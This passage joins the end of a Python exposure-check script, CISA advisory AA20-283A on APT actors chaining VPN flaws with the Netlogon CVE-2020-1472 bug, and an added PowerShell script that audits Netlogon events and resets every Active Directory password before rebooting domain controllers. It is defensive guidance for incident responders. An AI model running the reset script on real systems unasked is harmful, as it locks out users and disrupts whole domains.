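    {"host": "pa-legacy", "product": "PAN-OS", "version": "8.0.20"},   # all of 8.0 is affected
]

if __name__ == "__main__":
    for host, cve in find_exposures(SAMPLE_INVENTORY):
        print(f"{host}: {cve} (see Table 1 for patch information)")
```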
AA20-283A: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations
Original release date: October 9, 2020 | Last revised: October 24, 2020<br/><h3>Summary</h3><p class="tip-intro" style="font-size: 15px;"><em>This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) framework. See the <a href="https://attack.mitre.org/versions/v7/matrices/enterprise/">ATT&amp;CK for Enterprise</a> framework for all referenced threat actor techniques.</em></p> <p><strong>Note:</strong> the analysis in this joint cybersecurity advisory is ongoing, and the information provided should not be considered comprehensive. The Cybersecurity and Infrastructure Security Agency (CISA) will update this advisory as new information is available.</p> <p>This joint cybersecurity advisory was written by CISA with contributions from the Federal Bureau of Investigation (FBI).</p> <p>CISA has recently observed advanced persistent threat (APT) actors exploiting multiple legacy vulnerabilities in combination with a newer privilege escalation vulnerability—<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">CVE-2020-1472</a>—in Windows Netlogon. The commonly used tactic, known as vulnerability chaining, exploits multiple vulnerabilities in the course of a single intrusion to compromise a network or application.</p> <p>This recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks. Although it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.</p> <p>CISA is aware of some instances where this activity resulted in unauthorized access to elections support systems; however, CISA has no evidence to date that integrity of elections data has been compromised. 
There are steps that election officials, their supporting SLTT IT staff, and vendors can take to help defend against this malicious cyber activity.</p> <p>Some common tactics, techniques, and procedures (TTPs) used by APT actors include leveraging legacy network access and virtual private network (VPN) vulnerabilities in association with the recent critical <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">CVE-2020-1472</a> Netlogon vulnerability. CISA is aware of multiple cases where the Fortinet FortiOS Secure Socket Layer (SSL) VPN vulnerability <a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379">CVE-2018-13379</a> has been exploited to gain access to networks. To a lesser extent, CISA has also observed threat actors exploiting the MobileIron vulnerability <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-15505">CVE-2020-15505</a>. While these exploits have been observed recently, this activity is ongoing and still unfolding.</p> <p>After gaining initial access, the actors exploit <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">CVE-2020-1472</a> to compromise all Active Directory (AD) identity services. Actors have then been observed using legitimate remote access tools, such as VPN and Remote Desktop Protocol (RDP), to access the environment with the compromised credentials. 
Observed activity targets multiple sectors and is not limited to SLTT entities.</p> <p>CISA recommends network staff and administrators review internet-facing infrastructure for these and similar vulnerabilities that have or could be exploited to a similar effect, including Juniper <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1631">CVE-2020-1631</a>, Pulse Secure <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-11510">CVE-2019-11510</a>, Citrix NetScaler <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19781">CVE-2019-19781</a>, and Palo Alto Networks <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-2021">CVE-2020-2021</a> (this list is not considered exhaustive).</p> <p><a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-283A-APT_Actors_Chaining_Vulnerabilities.pdf">Click here</a> for a PDF version of this report.</p> <h3>Technical Details</h3><h3>Initial Access</h3> <p>APT threat actors are actively leveraging legacy vulnerabilities in internet-facing infrastructure (<em>Exploit Public-Facing Application</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1190/">T1190</a>], <em>External Remote Services</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1133/">T1133</a>]) to gain initial access into systems. The APT actors appear to have predominantly gained initial access via the Fortinet FortiOS VPN vulnerability <a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379">CVE-2018-13379</a>.</p> <p>Although not observed in this campaign, other vulnerabilities, listed below, could be used to gain network access (as analysis is evolving, these listed vulnerabilities should not be considered comprehensive). 
As a best practice, it is critical to patch all known vulnerabilities within internet-facing infrastructure.</p> <ul> <li>Citrix NetScaler <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19781">CVE-2019-19781</a></li> <li>MobileIron <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-15505">CVE-2020-15505</a></li> <li>Pulse Secure <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-11510">CVE-2019-11510</a></li> <li>Palo Alto Networks <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-2021">CVE-2020-2021</a></li> <li>F5 BIG-IP <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-5902">CVE-2020-5902</a></li> </ul> <h4>Fortinet FortiOS SSL VPN CVE-2018-13379</h4> <p><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379">CVE-2018-13379</a> is a path traversal vulnerability in the FortiOS SSL VPN web portal. An unauthenticated attacker could exploit this vulnerability to download FortiOS system files through specially crafted HTTP resource requests.[<a href="https://www.fortiguard.com/psirt/FG-IR-18-384">1</a>]</p> <h4>MobileIron Core &amp; Connector Vulnerability CVE-2020-15505</h4> <p><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-15505">CVE-2020-15505</a> is a remote code execution vulnerability in MobileIron Core &amp; Connector versions 10.3 and earlier.[<a href="https://www.mobileiron.com/en/blog/mobileiron-security-updates-available">2</a>] This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.</p> <h3>Privilege Escalation</h3> <p>Post initial access, the APT actors use multiple techniques to expand access to the environment. 
The actors are leveraging <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">CVE-2020-1472</a> in Windows Netlogon to escalate privileges and obtain access to Windows AD servers. Actors are also leveraging open-source tools such as Mimikatz and CrackMapExec to obtain valid account credentials from AD servers (<em>Valid Accounts</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1078/">T1078</a>]).</p> <h4>Microsoft Netlogon Remote Protocol Vulnerability: CVE-2020-1472</h4> <p><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">CVE-2020-1472</a> is a vulnerability in Microsoft Windows Netlogon Remote Protocol (MS-NRPC), a core authentication component of Active Directory.[<a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">3</a>] This vulnerability could allow an unauthenticated attacker with network access to a domain controller to completely compromise all AD identity services (<em>Valid Accounts: Domain Accounts</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1078/002/">T1078.002</a>]). Malicious actors can leverage this vulnerability to compromise other devices on the network (<em>Lateral Movement</em> [<a href="https://attack.mitre.org/versions/v7/tactics/TA0008/">TA0008</a>]).</p> <h3>Persistence</h3> <p>Once system access has been achieved, the APT actors abuse legitimate credentials (<em>Valid Accounts</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1078/">T1078</a>]) to log in via VPN or remote access services (<em>External Remote Services</em> [<a href="https://attack.mitre.org/versions/v7/techniques/T1133/">T1133</a>]) to maintain persistence.</p> <h3>Mitigations</h3><p>Organizations with externally facing infrastructure devices that have the vulnerabilities listed in this joint cybersecurity advisory, or other vulnerabilities, should move forward with an “assume breach” mentality. 
As initial exploitation and escalation may be the only observable exploitation activity, most mitigations will need to focus on more traditional network hygiene and user management activities.</p> <h3>Keep Systems Up to Date</h3> <p>Patch systems and equipment promptly and diligently. Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. See table 1 for patch information on CVEs mentioned in this report.</p> <p class="text-align-center"><em>Table 1: Patch information for CVEs</em></p> <table border="1" cellpadding="1" cellspacing="1" class="general-table" style="width: 918.333px; height: 312px; margin-left: auto; margin-right: auto;"> <thead> <tr> <th scope="col" style="width: 137px;"><strong>Vulnerability</strong></th> <th scope="col" style="width: 321px;"><strong>Vulnerable Products</strong></th> <th scope="col" style="width: 442px;"><strong>Patch Information</strong></th> </tr> </thead> <tbody> <tr> <td scope="col" style="text-align: left; width: 137px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379">CVE-2018-13379</a></td> <td scope="col" style="text-align: left; width: 321px;"> <ul> <li>FortiOS 6.0: 6.0.0 to 6.0.4</li> <li>FortiOS 5.6: 5.6.3 to 5.6.7</li> <li>FortiOS 5.4: 5.4.6 to 5.4.12</li> </ul> </td> <td scope="col" style="text-align: left; width: 442px;"> <ul> <li><a href="https://www.fortiguard.com/psirt/FG-IR-18-384">Fortinet Security Advisory: FG-IR-18-384</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 137px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-19781">CVE-2019-19781</a></td> <td scope="col" style="text-align: left; width: 321px;"> <ul> <li>Citrix Application Delivery Controller</li> <li>Citrix Gateway</li> <li>Citrix SDWAN WANOP</li> </ul> </td> <td scope="col" style="text-align: left; width: 442px;"> <ul> <li><a 
href="https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0</a></li> <li><a href="https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/">Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3</a></li> <li><a href="https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0</a></li> <li><a href="https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/">Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 137px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-5902">CVE-2020-5902</a></td> <td scope="col" style="text-align: left; width: 321px;"> <ul> <li>Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)</li> </ul> </td> <td scope="col" style="text-align: left; width: 442px;"> <ul> <li><a href="https://support.f5.com/csp/article/K52145254">F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 137px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-11510">CVE-2019-11510</a></td> <td scope="col" style="text-align: left; width: 321px;"> <ul> <li>Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15</li> <li>Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15</li> </ul> </td> <td scope="col" style="text-align: left; width: 442px;"> <ul> <li><a 
href="https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101">Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 137px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-15505">CVE-2020-15505</a></td> <td scope="col" style="text-align: left; width: 321px;"> <ul> <li>MobileIron Core &amp; Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0</li> <li>Sentry versions 9.7.2 and earlier, and 9.8.0</li> <li>Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier</li> </ul> </td> <td scope="col" style="text-align: left; width: 442px;"> <ul> <li><a href="https://www.mobileiron.com/en/blog/mobileiron-security-updates-available">MobileIron Blog: MobileIron Security Updates Available</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 137px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1631">CVE-2020-1631</a></td> <td scope="col" style="text-align: left; width: 321px;"> <ul> <li>Junos OS 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 15.1X53, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4, 20.1</li> </ul> </td> <td scope="col" style="text-align: left; width: 442px;"> <ul> <li><a href="https://kb.juniper.net/InfoCenter/index?page=content&amp;id=JSA11021">Juniper Security Advisory JSA11021</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 137px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-2021">CVE-2020-2021</a></td> <td scope="col" style="text-align: left; width: 321px;"> <ul> <li>PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15, and all versions of PAN-OS 8.0 (EOL)</li> </ul> </td> <td scope="col" style="text-align: left; width: 442px;"> <ul> <li><a 
href="https://security.paloaltonetworks.com/CVE-2020-2021">Palo Alto Networks Security Advisory for CVE-2020-2021</a></li> </ul> </td> </tr> <tr> <td scope="col" style="text-align: left; width: 137px;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">CVE-2020-1472</a></td> <td scope="col" style="text-align: left; width: 321px;"> <ul> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li> <li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li> <li>Windows Server 2012</li> <li>Windows Server 2012 (Server Core installation)</li> <li>Windows Server 2012 R2</li> <li>Windows Server 2016</li> <li>Windows Server 2019</li> <li>Windows Server 2019 (Server Core installation)</li> <li>Windows Server, version 1903&nbsp; (Server Core installation)</li> <li>Windows Server, version 1909&nbsp; (Server Core installation)</li> <li>Windows Server, version 2004&nbsp;&nbsp; (Server Core installation)</li> </ul> </td> <td scope="col" style="text-align: left; width: 442px;"> <ul> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">Microsoft Security Advisory for CVE-2020-1472</a></li> </ul> </td> </tr> </tbody> </table> <h3>Comprehensive Account Resets</h3> <p>If there is an observation of <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">CVE-2020-1472</a> Netlogon activity or other indications of valid credential abuse detected, it should be assumed the APT actors have compromised AD administrative accounts, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through “creative destruction,” wherein as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. 
This will need to be completed for on-premises as well as Azure-hosted AD instances.</p> <p>Note that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.</p> <p>It is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.</p> <ol> <li>Create a temporary administrator account, and use only this account for all administrative actions</li> <li>Reset the Kerberos Ticket Granting Ticket (<code>krbtgt</code>) password [<a href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password">4</a>]; this must be completed before any additional actions (a second reset will take place in step 5)</li> <li>Wait for the <code>krbtgt</code> reset to propagate to all domain controllers (time may vary)</li> <li>Reset all account passwords (passwords should be 15 characters or more and randomly assigned): <ol type="a"> <li>User accounts (forced reset with no legacy password reuse)</li> <li>Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])</li> <li>Service accounts</li> <li>Directory Services Restore Mode (DSRM) account</li> <li>Domain Controller machine account</li> <li>Application passwords</li> </ol> </li> <li>Reset the <code>krbtgt</code> password again</li> <li>Wait for the <code>krbtgt</code> reset to propagate to all domain controllers (time may vary)</li> <li>Reboot domain controllers</li> <li>Reboot all endpoints</li> </ol> <p>The following accounts should be reset:</p> <ul> <li>AD Kerberos Authentication Master (2x)</li> <li>All Active Directory Accounts</li> <li>All Active Directory Admin Accounts</li> <li>All Active Directory Service Accounts</li> <li>All Active Directory User Accounts</li> <li>DSRM Account on Domain Controllers</li> <li>Non-AD Privileged Application Accounts</li> <li>Non-AD 
Unprivileged Application Accounts</li> <li>Non-Windows Privileged Accounts</li> <li>Non-Windows User Accounts</li> <li>Windows Computer Accounts</li> <li>Windows Local Admin</li> </ul> <h3>CVE-2020-1472</h3> <p>To secure your organization’s Netlogon channel connections:</p> <ul> <li><strong>Update all Domain Controllers and Read Only Domain Controllers</strong>. On August 11, 2020, Microsoft released <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">software updates</a> to mitigate CVE-2020-1472. Applying this update to domain controllers is currently the only mitigation to this vulnerability (aside from removing affected domain controllers from the network).</li> <li><strong>Monitor for new events, and address non-compliant devices</strong> that are using vulnerable Netlogon secure channel connections.</li> <li><strong>Block public access to potentially vulnerable ports</strong>, such as 445 (Server Message Block [SMB]) and 135 (Remote Procedure Call [RPC]).</li> </ul> <p>To protect your organization against this CVE, follow <a href="https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc">advice from Microsoft</a>, including:</p> <ul> <li>Update your domain controllers with an update released August 11, 2020, or later.</li> <li>Find which devices are making vulnerable connections by monitoring event logs.</li> <li>Address non-compliant devices making vulnerable connections.</li> <li>Enable enforcement mode to address <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">CVE-2020-1472</a> in your environment.</li> </ul> <h3>VPN Vulnerabilities</h3> <p>Implement the following recommendations to secure your organization’s VPNs:</p> <ul> <li><strong>Update VPNs, network infrastructure devices, and devices </strong>being used to remote into work environments with the latest software 
patches and security configurations. See CISA Tips <a href="https://us-cert.cisa.gov/ncas/tips/ST04-006">Understanding Patches and Software Updates</a> and <a href="https://us-cert.cisa.gov/ncas/tips/ST18-001">Securing Network Infrastructure Devices</a>. Wherever possible, enable automatic updates. See table 1 for patch information on VPN-related CVEs mentioned in this report.</li> <li><strong>Implement multi-factor authentication (MFA) on all VPN connections to increase security</strong>. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips <a href="https://us-cert.cisa.gov/ncas/tips/ST04-002">Choosing and Protecting Passwords</a> and <a href="https://us-cert.cisa.gov/ncas/tips/ST05-012">Supplementing Passwords</a> for more information.</li> </ul> <p>Discontinue unused VPN servers. Reduce your organization’s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:</p> <ul> <li><strong>Audit </strong>configuration and patch management programs.</li> <li><strong>Monitor</strong> network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., Secure Shell [SSH], SMB, RDP).</li> <li><strong>Implement </strong>MFA, especially for privileged accounts.</li> <li><strong>Use </strong>separate administrative accounts on separate administration workstations.</li> <li><strong>Keep </strong><a href="https://us-cert.cisa.gov/ncas/tips/ST04-006">software up to date</a>. 
Enable automatic updates, if available.&nbsp;</li> </ul> <h3>How to uncover and mitigate malicious activity</h3> <ul> <li><strong>Collect and remove</strong> for further analysis: <ul> <li>Relevant artifacts, logs, and data.</li> </ul> </li> <li><strong>Implement </strong>mitigation steps that avoid tipping off the adversary that their presence in the network has been discovered.</li> <li><strong>Consider </strong>soliciting incident response support from a third-party IT security organization to: <ul> <li>Provide subject matter expertise and technical support to the incident response.</li> <li>Ensure that the actor is eradicated from the network.</li> <li>Avoid residual issues that could result in follow-up compromises once the incident is closed.</li> </ul> </li> </ul> <h3>Resources</h3> <ul> <li><a href="https://www.cisa.gov/vpn-related-guidance">CISA VPN-Related Guidance</a></li> <li>CISA Infographic: <a href="https://www.cisa.gov/sites/default/files/publications/Risk and Vulnerability Assessment %28RVA%29 Mapped to the MITRE ATT%26amp%3BCK Framework Infographic_v6-100620_ 508.pdf">Risk Vulnerability And Assessment (RVA) Mapped to the MITRE ATT&amp;CK FRAMEWORK</a></li> <li>National Security Agency InfoSheet: <a href="https://media.defense.gov/2020/Jul/02/2002355501/-1/-1/0/CONFIGURING_IPSEC_VIRTUAL_PRIVATE_NETWORKS_2020_07_01_FINAL_RELEASE.PDF">Configuring IPsec Virtual Private Networks</a></li> <li>CISA Joint Advisory: <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-245a">AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity</a></li> <li>CISA Activity Alert: <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-073a">AA20-073A: Enterprise VPN Security</a></li> <li>CISA Activity Alert: <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-031a">AA20-031A: Detecting Citrix CVE-2019-19781</a></li> <li>CISA Activity Alert: <a href="https://us-cert.cisa.gov/ncas/alerts/aa20-010a">AA20-010A: Continued Exploitation of Pulse Secure VPN 
Vulnerability</a></li> <li><strong>Cybersecurity Alerts and Advisories</strong>: Subscriptions to <a href="https://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/new">CISA Alerts</a> and <a href="https://learn.cisecurity.org/ms-isac-subscription">MS-ISAC Advisories</a></li> </ul> <h3>Contact Information</h3><p>Recipients of this report are encouraged to contribute any additional information that they may have related to this threat.</p> <p>For any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:</p> <ul> <li>CISA (888-282-0870 or <a href="mailto:Central@cisa.dhs.gov">Central@cisa.dhs.gov</a>), or</li> <li>The FBI through the FBI Cyber Division (855-292-3937 or <a href="mailto:CyWatch@fbi.gov">CyWatch@fbi.gov</a>) or a <a href="https://www.fbi.gov/contact-us/field-offices/field-offices">local field office</a></li> </ul> <div class="special_container text-align-center"><strong><em>DISCLAIMER</em></strong></div> <div class="special_container"> <p><em>This information is provided "as is" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. 
In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.</em></p> <p><em>The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.</em></p> </div> <h3>References</h3> <ul> <li><a href="https://www.fortiguard.com/psirt/FG-IR-18-384">[1] Fortinet Advisory: FG-IR-18-384 </a></li> <li><a href="https://www.mobileiron.com/en/blog/mobileiron-security-updates-available">[2] MobileIron Blog: MobileIron Security Updates Available</a></li> <li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472">[3] Microsoft Security Advisory for CVE-2020-1472</a></li> <li><a href="https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password">[4] Microsoft: AD Forest Recovery - Resetting the krbtgt password</a></li> </ul> <h3>Revisions</h3> <ul> <li>October 9, 2020: Initial Version</li> <li>October 11, 2020: Updated Summary</li> <li>October 12, 2020: Added Additional Links</li> </ul> <hr /> <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p class="privacy-and-terms">This product is provided subject to this <a href="https://us-cert.cisa.gov/privacy/notification">Notification</a> and this <a 
href="https://www.dhs.gov/privacy-policy">Privacy &amp; Use</a> policy.</p> </div>
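The CVE-2020-1472 Netlogon mitigations and the comprehensive account-reset procedure in the alert above can be driven and verified from PowerShell. The script below is an added example written for this page, not CISA or Microsoft code. It queries each domain controller for the Netlogon secure channel event IDs that the Microsoft KB4557222 guidance linked above uses to find non-compliant devices, reports whether each domain controller has enforcement mode set, and scripts steps 1 through 7 of the reset procedure with a dry-run option. It assumes a domain-joined management host with the RSAT ActiveDirectory module, WinRM access to the domain controllers, and Domain Admin rights; the account name IR-TempAdmin and the timeout values are placeholders, and the host-side resets (local and LAPS accounts, DSRM, domain controller machine accounts, application passwords) stay manual.

```powershell
#Requires -Modules ActiveDirectory
# Added example (not CISA or Microsoft code). Run from a domain-joined
# management host as Domain Admin. Invoke-ForestCredentialReset honours -WhatIf.

# --- CVE-2020-1472: find devices still using vulnerable Netlogon channels -----
# Event IDs documented in Microsoft KB4557222 (System log on each DC):
#   5827/5828  vulnerable connection denied
#   5829       vulnerable connection allowed (initial deployment phase)
#   5830/5831  vulnerable connection allowed by a group policy exception
function Get-VulnerableNetlogonEvent {
    param(
        [string[]] $DomainController = (Get-ADDomainController -Filter *).HostName,
        [datetime] $Since = (Get-Date).AddDays(-7)
    )
    foreach ($dc in $DomainController) {
        Get-WinEvent -ComputerName $dc -ErrorAction SilentlyContinue -FilterHashtable @{
            LogName = 'System'; Id = 5827, 5828, 5829, 5830, 5831; StartTime = $Since
        } | ForEach-Object {
            [pscustomobject]@{
                DomainController = $dc
                TimeCreated      = $_.TimeCreated
                EventId          = $_.Id
                # the first message line names the device that used the channel
                Summary          = ($_.Message -split "`r?`n")[0]
            }
        }
    }
}

# Enforcement mode (KB4557222): FullSecureChannelProtection = 1 means the DC
# rejects every vulnerable connection; 0 or absent means it still allows them.
function Test-NetlogonEnforcement {
    param([string[]] $DomainController = (Get-ADDomainController -Filter *).HostName)
    Invoke-Command -ComputerName $DomainController -ScriptBlock {
        $p = Get-ItemProperty -ErrorAction SilentlyContinue `
            -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters'
        [pscustomobject]@{ DomainController = $env:COMPUTERNAME
                           EnforcementMode  = ($p.FullSecureChannelProtection -eq 1) }
    }
}

# --- Comprehensive account reset (steps 1-7 of the procedure above) ----------
function New-RandomPassword {
    param([int] $Length = 24)   # the alert asks for 15 or more random characters
    $rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
    $buf = New-Object byte[] 1
    $chars = New-Object System.Collections.Generic.List[char]
    while ($chars.Count -lt $Length) {
        $rng.GetBytes($buf)
        # printable ASCII 0x21-0x7E is 94 symbols; rejecting bytes >= 188 avoids modulo bias
        if ($buf[0] -lt 188) { $chars.Add([char](33 + ($buf[0] % 94))) }
    }
    $chars -join ''
}

# Steps 3 and 6: the new krbtgt password is effective only once every DC has it.
function Wait-KrbtgtReplication {
    param([string[]] $DomainController, [int] $TimeoutMinutes = 60)   # placeholder timeout
    $pdc = (Get-ADDomain).PDCEmulator
    $reference = (Get-ADUser krbtgt -Server $pdc -Properties pwdLastSet).pwdLastSet
    $deadline = (Get-Date).AddMinutes($TimeoutMinutes)
    do {
        $lagging = @($DomainController | Where-Object {
            (Get-ADUser krbtgt -Server $_ -Properties pwdLastSet).pwdLastSet -ne $reference })
        if ($lagging.Count -eq 0) { return }
        Start-Sleep -Seconds 30
    } while ((Get-Date) -lt $deadline)
    throw "krbtgt reset has not replicated to: $($lagging -join ', ')"
}

function Invoke-ForestCredentialReset {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([string] $TempAdminName = 'IR-TempAdmin', [int] $PasswordLength = 24)  # placeholder name
    $dcs = (Get-ADDomainController -Filter *).HostName
    $newSecret = { ConvertTo-SecureString (New-RandomPassword $PasswordLength) -AsPlainText -Force }

    # Step 1: temporary administrator, the only account used for the rest of the work
    if ($PSCmdlet.ShouldProcess($TempAdminName, 'Create temporary administrator')) {
        New-ADUser -Name $TempAdminName -AccountPassword (& $newSecret) -Enabled $true
        Add-ADGroupMember -Identity 'Domain Admins' -Members $TempAdminName
    }
    # Steps 2-3: first krbtgt reset; tickets minted under the previous key keep
    # validating until the second reset, which is why it is done twice.
    if ($PSCmdlet.ShouldProcess('krbtgt', 'Reset password (1 of 2)')) {
        Set-ADAccountPassword -Identity krbtgt -Reset -NewPassword (& $newSecret)
        Wait-KrbtgtReplication -DomainController $dcs
    }
    # Steps 4a and 4c: every enabled user and service account gets a random
    # password and a forced change at next logon, so no legacy password survives.
    Get-ADUser -Filter { Enabled -eq $true } |
        Where-Object { $_.SamAccountName -notin @('krbtgt', $TempAdminName) } |
        ForEach-Object {
            if ($PSCmdlet.ShouldProcess($_.SamAccountName, 'Reset password')) {
                Set-ADAccountPassword -Identity $_ -Reset -NewPassword (& $newSecret)
                Set-ADUser -Identity $_ -ChangePasswordAtLogon $true
            }
        }
    # Steps 4b, 4d, 4e and 4f happen outside this script: local/LAPS accounts on each
    # host, DSRM via ntdsutil, DC machine accounts via netdom resetpwd, application stores.
    # Steps 5-6: second krbtgt reset and another full replication wait
    if ($PSCmdlet.ShouldProcess('krbtgt', 'Reset password (2 of 2)')) {
        Set-ADAccountPassword -Identity krbtgt -Reset -NewPassword (& $newSecret)
        Wait-KrbtgtReplication -DomainController $dcs
    }
    # Step 7: reboot the domain controllers (step 8, all endpoints, follows separately)
    if ($PSCmdlet.ShouldProcess(($dcs -join ', '), 'Restart domain controllers')) {
        Restart-Computer -ComputerName $dcs -Force
    }
}
```

Run `Get-VulnerableNetlogonEvent` and `Test-NetlogonEnforcement` first: any 5829 event identifies a device that still makes vulnerable connections, and a domain controller without enforcement mode still accepts them. Call `Invoke-ForestCredentialReset -WhatIf` to see every account the reset would touch before running it for real, and do not run it from a session on one of the domain controllers it reboots.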

AA20-280A: Emotet Malware
